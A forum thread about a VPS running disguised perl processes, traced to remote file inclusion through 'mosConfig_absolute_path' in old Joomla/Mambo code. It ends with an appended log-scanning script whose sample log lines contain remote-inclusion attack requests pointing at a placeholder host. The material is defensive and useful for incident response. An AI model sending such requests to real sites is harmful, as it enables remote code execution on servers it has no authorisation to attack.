
Lots of apache /usr/sbin/apache2 -k start processes

bob231

We got notices from our VPS provider that our VPS may have problems:

They point to this report: http://firewall.sigsiu.net/index.php?ip=85.17.149.15&force=1

On the server we notice there is a large number of perl processes.
When we check the command of one of those processes in /proc, it says:
/usr/sbin/apache2 -k start

We also enabled server-status in http to find out more information about the process, but these processes were not displayed.

Then we ran rkhunter; it didn't detect any malware.
My question is: how can we be sure this VPS isn't hacked, and how can we find out more information about the perl processes?

Thanks a lot.
 
First, please turn on mod_security to make sure that these exploits are blocked by your server.

"mosConfig_absolute_path" is used in insecure Mambo and Joomla sources, and with this part of the code it is possible to include a remote file in a URL. => So please check the Mambo and Joomla sources and extensions for such exploits and deactivate them by renaming the whole folder of the source or extension on that domain. Inform the subscriber of the domain that you deactivated the source or extension for security reasons.
 
Thanks for the feedback! It's really useful. Do you maybe also know a way to detect all insecure sources in one command?
We have to find files containing mosConfig_absolute_path, right?
 
@bob231 :

You could use "find" or "grep" on Linux-based systems.
Code:
Example:

grep -H -r "mosConfig_absolute_path" /var/www/
This will search for the pattern "mosConfig_absolute_path" in the folder "/var/www/" recursively. Depending on your domains and files on your system, this could take a while... get some coffee and enjoy the sun while the search takes place. ^^
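A complement to the source grep above, added here as an example and not part of the original thread: scanning the web server access logs for requests that actually passed a remote URL in mosConfig_absolute_path shows which domain and script were targeted. It assumes the Apache "combined" log format; the function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: report access-log requests that put a remote URL into
# the mosConfig_absolute_path parameter. Assumes Apache "combined" format.

# scan_rfi_requests [LOGFILE...]   (reads stdin when no file is given)
# Prints: client_ip <TAB> http_status <TAB> requested_url
scan_rfi_requests() {
  awk '
    {
      # The request line is the first double-quoted field of the entry.
      n = split($0, q, "\"")
      if (n < 3) next
      split(q[2], r, " ")          # METHOD URL PROTOCOL
      url = r[2]
      low = tolower(url)
      # Undo the percent-escapes that would hide "://" from the match.
      gsub(/%3a/, ":", low)
      gsub(/%2f/, "/", low)
      if (low ~ /mosconfig_absolute_path=(https?|ftp):\/\//) {
        split(q[3], s, " ")        # status and size follow the request
        printf "%s\t%s\t%s\n", $1, s[1], url
      }
    }' "$@"
}

# Constructed sample entries (documentation IPs, .invalid hostnames).
sample_log() {
  cat <<'EOF'
203.0.113.7 - - [10/Oct/2012:13:55:36 +0200] "GET /components/com_example/example.php?mosConfig_absolute_path=http://files.example.invalid/id.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Oct/2012:13:56:01 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8311 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2012:13:57:12 +0200] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.invalid%2Fid.txt HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Oct/2012:13:58:40 +0200] "GET /index.php?mosConfig_absolute_path=/var/www/site HTTP/1.1" 200 900 "-" "Mozilla/5.0"
EOF
}

# Demo run on the sample; on a server, pass the vhost access logs instead.
sample_log | scan_rfi_requests
```

A hit with status 200 does not prove the inclusion succeeded, but it marks the script to review and disable first.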
 